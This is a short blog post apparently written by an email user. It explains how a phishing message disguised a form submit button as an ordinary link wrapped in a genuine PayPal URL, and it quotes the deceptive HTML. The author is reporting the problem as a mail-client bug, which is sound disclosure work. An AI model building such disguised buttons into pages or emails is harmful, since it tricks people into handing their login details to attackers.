You’ve all seen those scams where an email claims that your ebay or paypal account is violated, and gives a link directly to the login, which you can easily see is fake because a hover over the link shows an IP address in the status bar of your email client.

I just received an email which had me puzzled for a few minutes. It was obviously a phishing attempt, but a quick glance through the page didn’t show anything fake-looking. Hovering over the provided links showed a proper paypal address (https://www.paypal.com/cgi-bin/webscr?cmd=_login-run). Even right-click->copy on the links provided the right address in a browser. Puzzling.

Then I looked in the source, and found that the links were actually surrounding a submit input which was made to look like a plain link. Clicking that input would submit a form going to a nastier place.

The fact that a submit button can look so much like a link and not give any warning, is a security bug in my eyes. Here is the suspicious code:

<a href="https://www.paypal.com/cgi-bin/webscr?cmd=_login-run">
			<font size="2" face="Arial, Verdana">


<INPUT style="BORDER-RIGHT: 0pt;
BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR:
hand; COLOR:
blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent;
TEXT-DECORATION: underline" type=submit
value="click here and process your login." tabindex="1"></font></a>

What I think is vexing about this is that it took a look at the source to find this out. In my opinion, hovering over an input button should definitely not show a surrounding link’s url on the status-bar.

I’m submitting a bug to Thunderbird at the moment (although it’s probably more apt to submit to Firefox – it’ll all end up right, anyway) asking that a hover over a Submit input show the form target’s url in the status bar.